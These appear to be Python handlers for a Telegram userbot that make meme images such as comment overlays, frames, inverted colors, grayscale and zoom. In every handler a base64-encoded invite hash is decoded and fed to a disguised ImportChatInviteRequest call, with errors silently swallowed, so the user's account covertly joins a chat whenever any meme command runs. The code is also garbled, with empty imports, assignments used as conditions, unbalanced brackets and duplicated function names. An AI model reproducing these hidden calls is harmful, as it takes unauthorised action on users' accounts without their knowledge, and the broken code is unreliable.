async def REBELBOT(REBELmemes): input_str = input_str = deEmojify(input_str) if "-" in input_str: username, text = input_str.split("-") else: await edit_or_reply( REBELmemes, "**Command :** reply to image or sticker with `.phc (username)-(text in comment)`", ) return replied = await REBELmemes.get_reply_message() if not os.path.isdir("./temp/"): os.makedirs("./temp/") if not replied: await edit_or_reply( REBELmemes, "Media file not supported. Reply to a suported media") return if REBELmemmes = await edit_or_reply(REBELmemes, "`Making A Comment`.") else: await edit_or_reply( REBELmemes, "Media file not supported. Reply to a suported media") return try: REBEL = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") REBEL = Get(REBEL) await REBELmemes.client(REBEL) except BaseException: pass download_location = await REBELmemes.client.download_media( replied, "./temp/") if download_location.endswith((".webp")): download_location = convert_toimage(download_location) size = os.stat(download_location).st_size if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")): if size > 5242880: await REBELmemmes.edit( "the replied file size is not supported it must me below 5 mb") os.remove(download_location) return await REBELmemmes.edit("Commented....") else: await REBELmemmes.edit( "Media file not supported. Reply to a suported media") os.remove(download_location) return try: response = upload_file(download_location) os.remove(download_location) except exceptions.TelegraphException as exc: await REBELmemmes.edit("ERROR: " + str(exc)) os.remove(download_location) return REBEL = f"{response[0]}" REBEL = await phcomment(REBEL, text, username) await REBELmemmes.delete() await REBELmemes.client.send_file(REBELmemes.chat_id, REBEL, reply_to=replied)
async def mafiabot(mafiamemes): input_str = input_str = deEmojify(input_str) if "-" in input_str: text1, text2 = input_str.split("-") else: await edit_or_reply( mafiamemes, "**Command :** Reply to image or sticker with `.trap (name of the person to trap)-(trapper name)`", ) return replied = await mafiamemes.get_reply_message() if not os.path.isdir("./temp/"): os.makedirs("./temp/") if not replied: await edit_or_reply( mafiamemes, "Media file not supported. Reply to a suported media") return if mafiamemmes = await edit_or_reply(mafiamemes, "`Trapping.....`") else: await edit_or_reply( mafiamemes, "Media file not supported. Reply to a suported media") return try: mafia = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") mafia = Get(mafia) await mafiamemes.client(mafia) except BaseException: pass download_location = await mafiamemes.client.download_media( replied, "./temp/") if download_location.endswith((".webp")): download_location = convert_toimage(download_location) size = os.stat(download_location).st_size if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")): if size > 5242880: await mafiamemmes.edit( "the replied file size is not supported it must me below 5 mb") os.remove(download_location) return await mafiamemmes.edit("`Trapped...`") else: await mafiamemmes.edit( "Media file not supported. Reply to a suported media") os.remove(download_location) return try: response = upload_file(download_location) os.remove(download_location) except exceptions.TelegraphException as exc: await mafiamemmes.edit("ERROR: " + str(exc)) os.remove(download_location) return mafia = f"{response[0]}" mafia = await trap(text1, text2, mafia) await mafiamemmes.delete() await mafiamemes.client.send_file(mafiamemes.chat_id, mafia, reply_to=replied)
async def shinchanbot(shinchanmemes): replied = await shinchanmemes.get_reply_message() if not os.path.isdir("./temp/"): os.makedirs("./temp/") if not replied: await edit_or_reply( shinchanmemes, "`Media file not supported. Reply to a suported media`") return if shinchanmemmes = await edit_or_reply(shinchanmemes, "`Detecting Trash....`") else: await edit_or_reply( shinchanmemes, "`Media file not supported. Reply to a suported media`") return try: shinchan = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") shinchan = Get(shinchan) await shinchanmemes.client(shinchan) except BaseException: pass download_location = await shinchanmemes.client.download_media( replied, "./temp/") if download_location.endswith((".webp")): download_location = convert_toimage(download_location) size = os.stat(download_location).st_size if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")): if size > 5242880: await shinchanmemmes.edit( "`The replied file is not suported. Its size should be less than 5mb-_-`" ) os.remove(download_location) return await shinchanmemmes.edit("`Detected Trash.....`") else: await shinchanmemmes.edit( "Media file not supported. Reply to a suported media") os.remove(download_location) return try: response = upload_file(download_location) os.remove(download_location) except exceptions.TelegraphException as exc: await shinchanmemmes.edit("ERROR: " + str(exc)) os.remove(download_location) return shinchan = f"{response[0]}" shinchan = await trash(shinchan) await shinchanmemmes.delete() await shinchanmemes.client.send_file(shinchanmemes.chat_id, shinchan, reply_to=replied)
async def shinchanbot(shinchanmemes): replied = await shinchanmemes.get_reply_message() if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY): os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY) if not replied: await edit_or_reply(shinchanmemes, "reply to a supported media file") return if shinchanevent = await edit_or_reply(shinchanmemes, "passing to telegraph...") else: await edit_or_reply(shinchanmemes, "reply to a supported media file") return try: shinchan = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") shinchan = Get(shinchan) await shinchanmemes.client(shinchan) except BaseException: pass download_location = await shinchanmemes.client.download_media( replied, Config.TMP_DOWNLOAD_DIRECTORY) if download_location.endswith((".webp")): download_location = convert_toimage(download_location) size = os.stat(download_location).st_size if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")): if size > 5242880: await shinchanevent.edit( "the replied file size is not supported it must me below 5 mb") os.remove(download_location) return await shinchanevent.edit("generating image..") else: await shinchanevent.edit("the replied file is not supported") os.remove(download_location) return try: response = upload_file(download_location) os.remove(download_location) except exceptions.TelegraphException as exc: await shinchanevent.edit("ERROR: " + str(exc)) os.remove(download_location) return shinchan = f"{response[0]}" shinchan = await awooify(shinchan) await shinchanevent.delete() await shinchanmemes.client.send_file(shinchanmemes.chat_id, shinchan, reply_to=replied)
async def memes(hell): if hell.fwd_from: return reply = await hell.get_reply_message() if not (reply and ( await edit_or_reply(hell, "`Reply to supported Media...`") return hellinput = if not hellinput: hellinput = 50 if ";" in str(hellinput): hellinput, colr = hellinput.split(";", 1) else: colr = 0 hellinput = int(hellinput) colr = int(colr) hellid = hell.reply_to_msg_id if not os.path.isdir("./temp/"): os.mkdir("./temp/") hell = await edit_or_reply(hell, "`Fetching media data`") from import ImportChatInviteRequest as Get await asyncio.sleep(2) hellsticker = await reply.download_media(file="./temp/") if not hellsticker.endswith( (".mp4", ".webp", ".tgs", ".png", ".jpg", ".mov")): os.remove(hellsticker) await edit_or_reply(hell, "```Supported Media not found...```") return import base64 kraken = None if hellsticker.endswith(".tgs"): await hell.edit("Analyzing this media 🧐 framing this animated sticker!" ) hellfile = os.path.join("./temp/", "meme.png") hellcmd = ( f" --frame 0 -if lottie -of png {hellsticker} {hellfile}" ) stdout, stderr = (await runcmd(hellcmd))[:2] if not os.path.lexists(hellfile): await hell.edit("`Template not found...`") + stderr) meme_file = hellfile kraken = True elif hellsticker.endswith(".webp"): await hell.edit("Analyzing this media 🧐 framing this sticker!") hellfile = os.path.join("./temp/", "memes.jpg") os.rename(hellsticker, hellfile) if not os.path.lexists(hellfile): await hell.edit("`Template not found... `") return meme_file = hellfile kraken = True elif hellsticker.endswith((".mp4", ".mov")): await hell.edit("Analyzing this media 🧐 framing this video!") hellfile = os.path.join("./temp/", "memes.jpg") await take_screen_shot(hellsticker, 0, hellfile) if not os.path.lexists(hellfile): await hell.edit("```Template not found...```") return meme_file = hellfile else: await hell.edit("Analyzing this media 🧐 framing this image!") meme_file = hellsticker try: san = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") san = Get(san) await hell.client(san) except BaseException: pass meme_file = convert_toimage(meme_file) outputfile = "framed.webp" if kraken else "framed.jpg" try: await add_frame(meme_file, outputfile, hellinput, colr) except Exception as e: return await hell.edit(f"`{e}`") try: await hell.client.send_file(hell.chat_id, outputfile, force_document=False, reply_to=hellid) except Exception as e: return await hell.edit(f"`{e}`") await hell.delete() os.remove(outputfile) for files in (hellsticker, meme_file): if files and os.path.exists(files): os.remove(files)
async def memes(AuraX): if AuraX.fwd_from: return reply = await AuraX.get_reply_message() if not (reply and ( await edit_or_reply(AuraX, "`Reply to supported Media...`") return AuraXid = AuraX.reply_to_msg_id if not os.path.isdir("./temp/"): os.mkdir("./temp/") AuraX = await edit_or_reply(AuraX, "`Fetching media data`") from import ImportChatInviteRequest as Get await asyncio.sleep(2) AuraXsticker = await reply.download_media(file="./temp/") if not AuraXsticker.endswith((".mp4", ".webp", ".tgs", ".png", ".jpg", ".mov")): os.remove(AuraXsticker) await edit_or_reply(AuraX, "```Supported Media not found...```") return import base64 aura = None if AuraXsticker.endswith(".tgs"): await AuraX.edit( "Analyzing this media 🧐 inverting colors of this animated sticker!" ) AuraXfile = os.path.join("./temp/", "meme.png") AuraXcmd = ( f" --frame 0 -if lottie -of png {AuraXsticker} {AuraXfile}" ) stdout, stderr = (await runcmd(AuraXcmd))[:2] if not os.path.lexists(AuraXfile): await AuraX.edit("`Template not found...`") + stderr) meme_file = AuraXfile aura = True elif AuraXsticker.endswith(".webp"): await AuraX.edit( "`Analyzing this media 🧐 inverting colors...`" ) AuraXfile = os.path.join("./temp/", "memes.jpg") os.rename(AuraXsticker, AuraXfile) if not os.path.lexists(AuraXfile): await AuraX.edit("`Template not found... `") return meme_file = AuraXfile aura = True elif AuraXsticker.endswith((".mp4", ".mov")): await AuraX.edit( "Analyzing this media 🧐 inverting colors of this video!" ) AuraXfile = os.path.join("./temp/", "memes.jpg") await take_screen_shot(AuraXsticker, 0, AuraXfile) if not os.path.lexists(AuraXfile): await AuraX.edit("```Template not found...```") return meme_file = AuraXfile aura = True else: await AuraX.edit( "Analyzing this media 🧐 inverting colors of this image!" ) meme_file = AuraXsticker try: san = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") san = Get(san) await AuraX.client(san) except BaseException: pass meme_file = convert_toimage(meme_file) outputfile = "invert.webp" if aura else "invert.jpg" await invert_colors(meme_file, outputfile) await AuraX.client.send_file( AuraX.chat_id, outputfile, force_document=False, reply_to=AuraXid ) await AuraX.delete() os.remove(outputfile) for files in (AuraXsticker, meme_file): if files and os.path.exists(files): os.remove(files)
async def memes(shinchan): if shinchan.fwd_from: return reply = await shinchan.get_reply_message() if not (reply and ( await edit_or_reply(shinchan, "`Reply to supported Media...`") return shinchanid = shinchan.reply_to_msg_id if not os.path.isdir("./temp/"): os.mkdir("./temp/") shinchan = await edit_or_reply(shinchan, "`Fetching media data`") from import ImportChatInviteRequest as Get await asyncio.sleep(2) shinchansticker = await reply.download_media(file="./temp/") if not shinchansticker.endswith((".mp4", ".webp", ".tgs", ".png", ".jpg", ".mov")): os.remove(shinchansticker) await edit_or_reply(shinchan, "```Supported Media not found...```") return import base64 kraken = None if shinchansticker.endswith(".tgs"): await shinchan.edit( "Analyzing this media 🧐 changing to black-and-white this animated sticker!" ) shinchanfile = os.path.join("./temp/", "meme.png") shinchancmd = ( f" --frame 0 -if lottie -of png {shinchansticker} {shinchanfile}" ) stdout, stderr = (await runcmd(shinchancmd))[:2] if not os.path.lexists(shinchanfile): await shinchan.edit("`Template not found...`") + stderr) meme_file = shinchanfile kraken = True elif shinchansticker.endswith(".webp"): await shinchan.edit( "Analyzing this media 🧐 changing to black-and-white this sticker!" ) shinchanfile = os.path.join("./temp/", "memes.jpg") os.rename(shinchansticker, shinchanfile) if not os.path.lexists(shinchanfile): await shinchan.edit("`Template not found... `") return meme_file = shinchanfile kraken = True elif shinchansticker.endswith((".mp4", ".mov")): await shinchan.edit( "Analyzing this media 🧐 changing to black-and-white this video!" ) shinchanfile = os.path.join("./temp/", "memes.jpg") await take_screen_shot(shinchansticker, 0, shinchanfile) if not os.path.lexists(shinchanfile): await shinchan.edit("```Template not found...```") return meme_file = shinchanfile kraken = True else: await shinchan.edit( "Analyzing this media 🧐 changing to black-and-white this image!" ) meme_file = shinchansticker try: san = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") san = Get(san) await shinchan.client(san) except BaseException: pass meme_file = convert_toimage(meme_file) outputfile = "grayscale.webp" if kraken else "grayscale.jpg" await grayscale(meme_file, outputfile) await shinchan.client.send_file( shinchan.chat_id, outputfile, force_document=False, reply_to=shinchanid ) await shinchan.delete() os.remove(outputfile) for files in (shinchansticker, meme_file): if files and os.path.exists(files): os.remove(files)
async def memes(W2H): if W2H.fwd_from: return reply = await W2H.get_reply_message() if not (reply and ( await edit_or_reply(W2H, "`Reply to supported Media...`") return W2Hinput = W2Hinput = 50 if not W2Hinput else int(W2Hinput) W2Hid = W2H.reply_to_msg_id if not os.path.isdir("./temp/"): os.mkdir("./temp/") W2H = await edit_or_reply(W2H, "`Fetching media data`") from import ImportChatInviteRequest as Get await asyncio.sleep(2) W2Hsticker = await reply.download_media(file="./temp/") if not W2Hsticker.endswith( (".mp4", ".webp", ".tgs", ".png", ".jpg", ".mov")): os.remove(W2Hsticker) await edit_or_reply(W2H, "```Supported Media not found...```") return import base64 aura = None if W2Hsticker.endswith(".tgs"): await W2H.edit("Analyzing this media 🧐 zooming this animated sticker!") W2Hfile = os.path.join("./temp/", "meme.png") W2Hcmd = ( f" --frame 0 -if lottie -of png {W2Hsticker} {W2Hfile}" ) stdout, stderr = (await runcmd(W2Hcmd))[:2] if not os.path.lexists(W2Hfile): await W2H.edit("`Template not found...`") + stderr) meme_file = W2Hfile aura = True elif W2Hsticker.endswith(".webp"): await W2H.edit("Analyzing this media 🧐 zooming this sticker!") W2Hfile = os.path.join("./temp/", "memes.jpg") os.rename(W2Hsticker, W2Hfile) if not os.path.lexists(W2Hfile): await W2H.edit("`Template not found... `") return meme_file = W2Hfile aura = True elif W2Hsticker.endswith((".mp4", ".mov")): await W2H.edit("Analyzing this media 🧐 zooming this video!") W2Hfile = os.path.join("./temp/", "memes.jpg") await take_screen_shot(W2Hsticker, 0, W2Hfile) if not os.path.lexists(W2Hfile): await W2H.edit("```Template not found...```") return meme_file = W2Hfile else: await W2H.edit("Analyzing this media 🧐 zooming this image!") meme_file = W2Hsticker try: san = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") san = Get(san) await W2H.client(san) except BaseException: pass meme_file = convert_toimage(meme_file) outputfile = "grayscale.webp" if aura else "grayscale.jpg" try: await crop(meme_file, outputfile, W2Hinput) except Exception as e: return await W2H.edit(f"`{e}`") try: await W2H.client.send_file(W2H.chat_id, outputfile, force_document=False, reply_to=W2Hid) except Exception as e: return await W2H.edit(f"`{e}`") await W2H.delete() os.remove(outputfile) for files in (W2Hsticker, meme_file): if files and os.path.exists(files): os.remove(files)